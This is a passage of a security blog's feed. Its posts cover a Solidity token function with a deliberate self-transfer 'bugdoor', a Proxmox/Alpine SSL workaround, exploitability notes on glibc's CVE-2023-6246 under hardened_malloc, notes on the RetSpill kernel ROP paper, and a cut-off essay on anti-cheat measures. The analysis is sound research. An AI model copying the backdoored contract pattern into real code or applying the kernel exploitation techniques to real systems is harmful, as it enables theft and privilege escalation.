+<p>Don't forget to put a <code>title</code> for <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#accessibility_concerns">accessibility's sake</a>.</p>jvoisinTue, 27 Feb 2024 14:45:00 +0100tag:dustri.org,2024-02-27:/b/youtube-video-embedding-harm-reduction.htmlwebA silly "smart" contract bughttps://dustri.org/b/a-silly-smart-contract-bug.html<p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
+when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
+apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
+interesting here is the bug, can you spot it?</p>
+<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint</span><span class="p">)</span><span class="w"> </span><span class="kt">internal</span><span class="w"> </span>virtual<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">fromBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>from<span class="p">];</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">toBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>to<span class="p">];</span>
+<span class="w"> </span><span class="kt">if</span><span class="w"> </span><span class="p">(</span>fromBalance<span class="w"> </span><span class="o"><</span><span class="w"> </span>value<span class="p">)</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span>revert<span class="w"> </span>ERC20InsufficientBalance<span class="p">(</span>from<span class="p">,</span><span class="w"> </span>fromBalance<span class="p">,</span><span class="w"> </span>value<span class="p">);</span>
+<span class="w"> </span><span class="p">}</span>
+
+<span class="w"> </span>unchecked<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="c1">// Overflow not possible: value <= fromBalance <= totalSupply.</span>
+<span class="w"> </span>_balances<span class="p">[</span>from<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>fromBalance<span class="w"> </span><span class="o">-</span><span class="w"> </span>value<span class="p">;</span>
+
+<span class="w"> </span><span class="c1">// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.</span>
+<span class="w"> </span>_balances<span class="p">[</span>to<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>toBalance<span class="w"> </span><span class="o">+</span><span class="w"> </span>value<span class="p">;</span>
+<span class="w"> </span><span class="p">}</span>
+</code></pre></div>
+
+<p>As a hint, look at <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f">this transaction</a>.
+Isn't it a cute bugdoor?</p>
+<p>The snippet is taken from <a href="https://twitter.com/shoucccc/status/1757777764646859121">this tweet</a>,
+giving the issue away. Thanks to <a href="https://github.com/kjsman">Jinseo Kim</a> for holding my hand
+understanding what was going on there.</p>jvoisinFri, 16 Feb 2024 13:30:00 +0100tag:dustri.org,2024-02-16:/b/a-silly-smart-contract-bug.htmlsecurityFixing the /usr/lib/ssl/certs debacle with Alpine Linux on Proxmoxhttps://dustri.org/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html<p>There are currently some issues with regard to OpenSSL and Alpine Linux on
+Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Promox since the 19<sup>th</sup> of January, with some patches sent by
+email (sigh) to fix the issue still waiting to land. The root cause being
+Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl/cert.pem'</code> when <code>pct enter</code> is
+used, while on Alpine the <code>cert.pem</code> file is in <code>/etc/ssl/cert.pem</code>.</p>
+<p>In the meantime, here is what the problem looks like (for
+<a href="https://en.wikipedia.org/wiki/Search_engine_optimization">SEO</a>) and how to
+hack around it: </p>
+<div class="codehilite"><pre><span></span><code><span class="go">root@pve ~ pct enter 122</span>
+<span class="gp"># </span>apk<span class="w"> </span>update
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/main: Permission denied</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/community: Permission denied</span>
+<span class="go">4 unavailable, 0 stale; 30 distinct packages available</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve ~ lxc-attach -n 122 </span>
+<span class="gp"># </span>apk<span class="w"> </span>update<span class="p">;</span><span class="w"> </span>apk<span class="w"> </span>upgrade
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">v3.18.6-10-g1bb71e18dfb [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]</span>
+<span class="go">v3.18.6-9-g41de282e84d [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]</span>
+<span class="go">OK: 20069 distinct packages available</span>
+<span class="go">OK: 10 MiB in 30 packages</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve 16:58 ~ </span>
+</code></pre></div>
+
+<p>tl;dr: <code>lxc attach -n 123</code> instead of <code>pct enter 123</code></p>jvoisinMon, 05 Feb 2024 17:00:00 +0100tag:dustri.org,2024-02-05:/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.htmlsysadminMusings on CVE-2023-6246 on hardened_mallochttps://dustri.org/b/musings-on-cve-2023-6246-on-hardened_malloc.html<p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
+a couple of hours ago a linear two-step heap buffer overflow in glibc's
+<code>syslog()</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
+<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
+<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags</span><span class="p">);</span>
+</code></pre></div>
+
+<p>the tl;dr is that <code>bufsize</code> is <code>0</code> while <code>l</code> is user-controlled.
+As mentioned in the advisory, messing with nss structures as done
+in their (phenomenal) <a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt"><code>Baron Samedit</code> sudo
+exploit</a>
+is a good way to get a root shell on the glibc.</p>
+<p>While the bug is in glibc's <code>syslog</code>, it's not unheard of for
+people to run custom allocators for performance/security/speed/… reasons.
+One of those could be, for example, <a href="https://github.com/GrapheneOS/hardened_malloc">hardened_malloc</a>,
+<a href="https://grapheneos.org">GrapheneOS</a>'s security-focused allocator, raising
+the question "would <code>hardened_malloc</code> make this particular bug
+unexploitable on my x86_64 Debian machine?"</p>
+<p>After discussing this with friends, we don't <em>think</em> that it makes
+the bug completely unexploitable, but ridiculously complicated, which is good
+enough™ for me. But keep in mind that this "analysis" was done hastily at 2am,
+so caveat lector.</p>
+<p><code>hardened_malloc</code> uses size-based slabs isolation, popularised by
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>.
+Since <code>bufsize</code> is zero, this is a 1-byte
+allocation, falling into the
+<a href="https://github.com/GrapheneOS/hardened_malloc/blob/main/h_malloc.c#L147">16 bytes size-class</a>,
+the smallest after the special <code>0</code> one. So to exploit this, one would have to find an
+interesting object of size 16 bytes or lower to overwrite. But since
+canaries are enabled by default, this becomes even more difficult: sizes of
+allocations are actually bumped by 8 bytes, meaning that one would actually
+have to find an interesting object of size 8 bytes or lower.</p>
+<p>Moreover, 16-byte slabs can contain at most 256 allocations, and are
+surrounded by guard pages, meaning that accessing anything below <code>buf</code> and
+above <code>buf+(256*16)</code> will result in a crash.</p>
+<p>Allocations are randomized, which might help for bruteforcing the heap layout:
+if the current one isn't exploitable, just crash and start again. But it will
+also result in a lot more crashes, since <code>buf</code> might be allocated closer to
+the guard page.</p>
+<p>There are of course other mitigations, but they aren't relevant in this
+particular case, like canaries that are checked on <code>free</code>,
+or <a href="https://community.arm.com/arm-community-blogs/b/architectures-and-processors-blog/posts/enhanced-security-through-mte">ARM's MTE</a> that completely kills linear-overflows.</p>
+<p>Given the ludicrous amount of randomization <code>hardened_malloc</code> applies to heap bases (32G
+per region), bruteforcing offsets of anything not on the heap is futile.
+So one would have to find something interesting in an object of 8 bytes or less on
+the heap, like a path to corrupt as in <code>service_user</code>,
+or some partial-overwrite of a function-pointer to call a
+<a href="https://david942j.blogspot.com/2017/02/project-one-gadget-in-glibc.html">one-shot-gadget</a>, …</p>
+<p>Thanks to <code>strcat</code> for the handholding, and
+to <code>jdoe</code>, <code>drvink</code> and <code>J</code> for their diligent proofreading,</p>jvoisinWed, 31 Jan 2024 02:00:00 +0100tag:dustri.org,2024-01-31:/b/musings-on-cve-2023-6246-on-hardened_malloc.htmlsecurityPaper notes: RetSpillhttps://dustri.org/b/paper-notes-retspill.html<ul>
+<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
+<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
+ <a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
+ <a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
+<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
+ <a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
+ <a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
+ and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
+ along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
+ <a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
+ <a href="http://xinyuxing.org/">Xinyu Xing</a> and
+ <a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
+</ul>
+<p>The idea of the paper is to use user-controlled data that are by design copied
+in kernel-land when exercising syscalls to store a <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">ROP</a>-chain, via 4 main venues:</p>
+<ul>
+<li>Valid Data directly copied onto the kernel stack for performance reasons, like when
+ calling <code>poll</code>;</li>
+<li>Preserved Registers, restored upon returning from kernel-land to
+ userland. </li>
+<li>Calling Convention compliant functions will save/restore registers, and
+ apparently, system call handlers are calling convention compliant
+ even though the kernel is already taking care of those,
+ and syscalls can <a href="https://www.kernel.org/doc/html/latest/process/adding-syscalls.html?highlight=syscall_define#do-not-call-system-calls-in-the-kernel">only be called from userland</a>.
+ But even if the syscalls handles weren't compliant, registers still contain
+ userland values when they're called, and sub-functions might store/restore
+ those registers, since those do need to be compliant.</li>
+<li>Uninitialized Memory, since the per-thread kernel stack is reused between syscalls,
+ and not erased (unless <code>PAX_MEMORY_STACKLEAK</code> is used).</li>
+</ul>
+<p>Then, only a <a href="https://en.wikipedia.org/wiki/KASLR">KASLR</a> leak,
+a CFHP (control-flow hijacking primitive)
+and a <code>add rsp, X; ret</code>-like gadget are required to <a href="https://www.youtube.com/watch?v=FoUWHfh733Y">ROP all the things</a>.
+Nowadays, most™ CFHP are created by corrupting the heap to hijack function
+pointers, and since every kernel thread shares the same heap,
+once it is is properly shaped, the control flow hijacking primitive can likely
+be triggered again and again from a different threads.
+Moreover, changing the exploit is simply a matter of re-invoking a syscall with
+different data spill, instead of having to reshape the heap every single time.
+One doesn't have to worry about crashes (enabling lame bruteforcing), since no
+major Linux distributions (except CentOS, kudos) has <code>panic_on_oops</code> enabled,
+so having a ROP-chain crash is no big deal, because the CFHP is still on the
+heap, one syscall away.</p>
+<p>Since the space afforded to store gadgets might be too small, one trick is to
+invoke <code>do_task_dead</code> at the end of every ROP-chain to terminate it gracefully,
+and trigger the CFHP again and again.</p>
+<p>Mitigation-wise: </p>
+<ul>
+<li><a href="https://en.wikipedia.org/wiki/Control_register#SMEP">SMEP</a>,
+ <a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMAP</a> and
+ <a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation">KPTI</a> are irrelevant.</li>
+<li><a href="https://pax.grsecurity.net/docs/randkstack.txt">RANDKSTACK</a> mitigates data spillage from Preserved Registers and Uninitialized Memory,
+ but since it only provides 5 bits of randomness, a <code>ret</code>-sled is enough
+ to bypass it (25.44% of the time if using gadgets from Preserved Registers or Uninitialized Memory, 100% otherwise),
+ and in the absence of <code>panic_on_oops</code> it can quickly be bruteforced anyway.</li>
+<li><a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Sanitize_kernel_stack">STACKLEAK</a>,
+ <a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Forcibly_initialize_local_variables_copied_to_userland">STRUCTLEAK</a>,
+ and <a href="https://lwn.net/Articles/823152/">CONFIG_INIT_STACK_*</a>
+ only mitigate data spillage from Uninitialized Memory.</li>
+<li><a href="https://lwn.net/Articles/824307/">FG-KASLR</a> is <a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/#gathering-useful-gadgets">useless</a>
+ since it doesn't randomize everything, leaving a couple (<code>42631</code> according to
+ the paper) of gadgets at position-invariant positions, which are enough to perform
+ arbitrary-reads and derandomize everything.</li>
+<li><a href="https://lore.kernel.org/lkml/202210010918.4918F847C4@keescook/T/#u">KCFI</a>
+ and <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">IBT</a>
+ also (currently) don't cover everything, but don't really matter much here
+ anyway, since we only care about backward-edges, and as for the CFHP:</li>
+<li>There <a href="https://i.blackhat.com/USA-22/Wednesday/US-22-Jin-Monitoring-Surveillance-Vendors.pdf#page=35">are ways</a>
+ to obtain one in the presence of perfect forward-edge CFI with a heap corruption.</li>
+<li>Using <code>__x86_indirect_thunk_rdi</code> allows to transform a forward-edge control-flow transition to backward edge one.</li>
+<li>Shadow stack and perfect CFI are a pipe dream that would mitigate RetSpill,
+ but <a href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf">PaX' RAP</a>
+ is really close to it, likely making it insanely hard, with its type-based
+ CFI, and its changing-on-every-syscall/task/… register-stored cookie paired
+ with unreadable kernel stacks for backward edge, on top of CFI.</li>
+</ul>
+<p>To showcase how cool all of this is, the paper comes with a semi-automated tool
+outputting the address of a stack-shifting gadget, a function to performs data
+spillage, invoke the triggering system call, and yield a root shell via a
+classic <code>commit_creds(init_cred)</code> + returning back to user space. It works by:</p>
+<ul>
+<li>taking full snapshots of a vm to locate the syscall leading to CFHP by using
+ a binary-search-like heuristic;</li>
+<li>mutating userland inputs (registers, <code>copy\_from\_user</code>/<code>get\_user</code>
+ parameters, …), continuing the execution of the vm,
+ marking the as user-controllable data if the CFHP still
+ happens after modifications, and doing taint analysis to find how to modify
+ them.</li>
+<li>generating a ROP-chain, which isn't that easy, given that:</li>
+<li>it's done over discrete controlled regions</li>
+<li>there are some constraints, like "<code>eax</code> contains the syscall number",
+ or "<code>edx</code> comes from both <em>Saved Registers</em> and <em>Calling Convention</em>
+ spillages.</li>
+</ul>
+<p>Of course, given that some authors are <a href="https://angr.io/">angr</a> developers,
+<a href="https://github.com/angr/angrop">angrop</a> was used to knit the ROP-chains, and
+the results are pretty impressive:</p>
+<blockquote>
+<p>The abundance of data spillage allows 20 out of 22 proof-of-concept programs
+that manifest CFHP to be semi-automatically turned into full privilege escalation exploits.</p>
+</blockquote>
+<p>To kill this technique, the authors suggest:</p>
+<ol>
+<li><em>Preserved Register</em>: <code>RANDKSTACK</code> helps, but storing userspace registers
+ somewhere else than on the stack would be even better, eg. in <code>task_struct</code>.</li>
+<li><em>Uninitialized Memory</em>: enable <code>STACKLEAK</code>/<code>STRUCTLEAK</code>/<code>CONFIG\_INIT\_STACK\_\*</code>,
+ but the performances impact is pretty steep.</li>
+<li><em>Calling Convention</em> and <em>Valid Data</em>: an improved version of <code>RANDKSTACK</code>,
+ adding a random offset at the bottom of each stack frame, between <code>rsp</code> and user data.
+ This technique also mitigates Preserved Registers and Uninitialized Memory,
+ with an average performance overhead of 0.61%.</li>
+</ol>
+<p>Like all good papers it comes <a href="https://github.com/sefcom/RetSpill">with code</a>.</p>
+<p>Amusingly:</p>
+<ul>
+<li>RetSpill completely bypasses OpenBSD's
+ <a href="https://isopenbsdsecu.re/mitigations/map_stack/">MAP_STACK</a> mitigation,
+ should it ever be implemented in kernel-land, </li>
+<li>The <a href="https://org.anize.rs/">Organizers</a> CTF team
+ <a href="https://org.anize.rs/0CTF-2021-finals/pwn/kernote">used</a>
+ the <a href="https://elixir.bootlin.com/linux/latest/ident/pt_regs"><code>ptregs</code></a> structure
+ to store their ROP chain for <a href="https://ctftime.org/event/1357">0CTF/TCTF 2021
+ Finals</a>'s
+ <a href="https://ctftime.org/task/17461">Kernote</a> pwn challenge.</li>
+</ul>jvoisinThu, 18 Jan 2024 16:45:00 +0100tag:dustri.org,2024-01-18:/b/paper-notes-retspill.htmlpaper_notesOn non-technical video-games cheat mitigationshttps://dustri.org/b/on-non-technical-video-games-cheat-mitigations.html<p>Cheats are as old as video games, and will be there as long. There
+are a couple of high-profile players in the anti-cheat market today:
+<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
+<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
+<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
+<a href="https://easy.ac/en-us/">Epic's EAC</a>,
+<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
+<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
+… as well as in-house ones.</p>
+<p>To try to keep up in the race, both sides are resorting to more and more invasive
+technical privacy-invasive measures: streaming virtualised shellcodes,
+hardware fingerprinting and locking,
+<a href="https://secret.club/2020/01/05/battleye-stack-walking.html">stack-walking</a>,
+bootkit-like kernel drivers,
+<a href="https://en.wikipedia.org/wiki/Trusted_Platform_Module">TPM</a>/
+secure boot/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">HVCI</a>/
+<a href="https://en.wikipedia.org/wiki/Input%E2%80%93output_memory_management_unit">IOMMU</a>/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a>/…
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/22291331362067-Vanguard-Restrictions">shenanigans</a>,
+hypervisors <a href="https://secret.club/2020/04/13/how-anti-cheats-detect-system-emulation.html">detection</a>/usage,
+<a href="https://secret.club/2020/03/31/battleye-developer-tracking.html">exfiltration of suspicious materials</a>,
+external <a href="https://en.wikipedia.org/wiki/Direct_memory_access">DMA</a> hardware,
+or other <a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">more exotic things</a>.</p>
+<p>Yet anti-cheats are still routinely bypassed, less in a public manner, granted, but private
+and closed-community cheats are still flourishing, since it's a losing game by
+nature. And since games and anti-cheats are software, they're of course riddled
+with <a href="https://vice.com/en/article/d7y5wj/street-fighter-v-rootkit">hilarious</a> bugs leading to
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/614682-eac-dll-loading-method-eac-forcer.html">stupid</a>
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/503052-easy-anti-cheat-kernel-packet-fucker.html">bypasses</a>.</p>
+<p>But this isn't what this blogpost is about. Nowadays, cheats are considered as
+part of a larger problem: abuses and toxicity. Cheats aren't (only) hunted down
+because they're morally questionable, but because they disturb the way the game is meant to be
+enjoyed. Toxic and abusive behaviours lead to the very same results:
+A game that isn't fun to play because of cheating/abuse/toxicity issues will see its
+players number decrease, have poor reviews, … and won't make money. I'm sure
+there is a parallel to be made about the current state of our society, but I
+digress.</p>
+<p>For this article, we'll consider cheating and abuse/toxicity
+as a single issue under the term <em>abuse</em>.
+Now, because abuse isn't a purely technical issue, but also a social one, it
+can't be solved by technical solutions only, so let's have
+a look at what non-technical mitigations game developers are
+coming up with to curb this issue.</p>
+<p>The most obvious mitigation is to make cheating expensive, money wise.
+Having to pay 60EUR for a game is a steep investment, especially if one
+has to buy it again every time they get banned. This of course doesn't
+apply for free-to-play games, but can be emulated by having a cosmetics
+ecosystem, either to pay for, or to grind. The other expensive thing when
+playing video games is the hardware, and bans can be tied to it.</p>
+<h2>Global measures</h2>
+<p>The <em>big</em> mitigation at this level is reputation systems. They're based on
+people who know best how a fun and fair game should go: players. After a
+match, they're encouraged to cast votes on how fair it was, on a match level,
+but also directly at players level: "Bob was really looking out for others",
+"Bob was a team player", and so on. For negative behaviour, reports don't have
+to wait the end of the match, players can report
+cheating, being offensive in the text/voice chat, <a href="https://en.wikipedia.org/wiki/Griefer">griefing</a>,
+queue dodging, <a href="https://www.urbandictionary.com/define.php?term=smurfing">smurfing</a>, …
+Of course, slanderous reports are penalised.</p>
+<p>Peer pressure is a good lever too, by taking action not only against cheaters,
+but from people benefiting from the cheat, like regular teammates.</p>
+<p><a href="https://en.wikipedia.org/wiki/Bug_bounty_program">Bug bounty programs</a> are now commonplace,
+so it's only logical that there are now <a href="https://hackerone.com/riot">some</a>
+rewarding anti-cheat bypasses/exploits. The rewards are a bit cheap for now,
+but will likely rise up as the programs mature. The positive effects are
+multiples:</p>
+<ol>
+<li>It increases the incentives to report issues to get them fixed: a player
+ finding a glitch/exploit can now get some cash for the discovery</li>
+<li>As more abuse vectors are killed, the reward prices will rise, and it might
+ become more profitable to report bugs than to sell them to cheat providers.
+ This isn't unheard of, with <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's
+ kernelCTF</a>
+ paying two times more than Zerodium.</li>
+<li>If the bug bounty program is correctly managed, the probability of getting a
+ given amount of money for reporting an issue will be higher than using it in
+ a cheat for an unknown period of time until it gets fixed.</li>
+<li>It will likely increase the amount of people looking for issues and willing
+ to report them.</li>
+</ol>
+<p>Community managers can also regularly <s>spread <a href="https://en.wikipedia.org/wiki/Fear,_uncertainty,_and_doubt">FUD</a></s>
+post updates about ban waves, anti-cheat measures, reports, … to make it
+clear that abusive behaviours are something being taken care of,
+and a dangerous gamble for players to take part in. I think
+I have seen some people spending time proving that some cheaters streaming live
+were in fact recycled pre-recorded footage from an earlier version of game,
+because some of the game details have been updated in the meantime.</p>
+<h2>Accounts-level measures</h2>
+<p>Some game stores, like <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>,
+have an account-level "cheater" mark, meaning that if someone gets banned from a game for cheating,
+other games can know about it. But more importantly,
+<a href="https://en.wikipedia.org/wiki/Achievement_(video_games)">achievements</a>
+and cosmetics are also tied to an account, and as mentioned previously,
+those are non-zero time and/or money investments. Getting banned means losing
+them. This of course only deters opportunistic cheaters,
+as people can simply create other accounts to cheat, but this can be made
+harder via purely technical means.</p>
+<p>Most <em>competitive</em> online games have ranked and casual game modes, with the
+former being only accessible after having spent a certain amount of time in the
+latter one. Meaning that one has to do it again every time they get banned,
+or <a href="https://en.wikipedia.org/wiki/Boosting_(video_games)">pay someone to do it</a>.
+Some studios are even making player go through more hoops to be able to play, like requiring
+<a href="https://en.wikipedia.org/wiki/Multi-factor_authentication">MFA</a>,
+or playing a couple of matches against <a href="https://en.wikipedia.org/wiki/Video_game_bot">bots</a>
+branded as a tutorial, before being able to play with other people. There is a
+course a fine balance to keep to annoy abusers but not legitimate players.</p>
+<h2>Player-level measures</h2>
+<p>The goal of non-technical measures isn't to make it impossible to be abusive,
+but to make it not worth it. Moreover, issuing instahwpermabans to <a href="https://en.wikipedia.org/wiki/Edgelord">edgelords</a>
+seems a tad heavy-handed, so having a large panel of measures against abuser makes sense:
+one might want to allow people to rectify their behaviour, to isolate them to
+cool down, and so on. It might include textual warnings, temporary bans, kick
+from the current game, chat/voice mute, losing access to ranked play,
+reducing the amount of earned experience points, …</p>
+<p>Players are abusive for various reasons, but I'd argue that most do because
+it's fun. Ruining the fun for them is thus a good way to curb such behaviours.
+A simple way to do this is to make them play together, by grouping players
+by reputation, or by having servers with technical anti-cheat measures
+explicitly disabled. But there are even more creative measures,
+like <a href="https://www.callofduty.com/en/blog/2023/11/call-of-duty-ricochet-anti-cheat-modern-warfare-III-progress-report">disabling their parachute</a>,
+reducing their damage output to ridiculous levels, taking away their weapons,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">making other legitimate players invisible to them</a>,
+randomly drop some of their inputs,
+<a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">hallucinations</a>, … and
+while this costs a bit more engineering time than simply grouping them
+together, it has a couple of high-value returns on investment:
+- allowing game developers to spend more time collecting data on how cheats are working on a technical level,
+- reducing the impact cheaters have on a game make is possible to
+ significantly defer banning them without impacting other players too much,
+ making it harder for cheat makers to pinpoint how and why a cheat was
+ detected.
+- it's absolutely hilarious</p>
+<h2>Examples</h2>
+<h3><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six Siege</a></h3>
+<ul>
+<li>It uses BattlEye, and in end-2022 early 2023 banned around
+ <a href="https://ubisoft.com/en-us/game/rainbow-six/siege/news-updates/2g7hT2NNuOqrj35RfgsFxN/anticheat-status-update-march-2023">5000</a>
+ accounts per month, which is a lot, but also shows that it doesn't deter
+ cheaters.</li>
+<li>The game costs <a href="https://store.steampowered.com/app/359550/Tom_Clancys_Rainbow_Six_Siege/">$8</a>,
+ but if you want to have access to all the operators, it's $70. One can also
+ unlock operators by playing, which takes several hundreds of hours.</li>
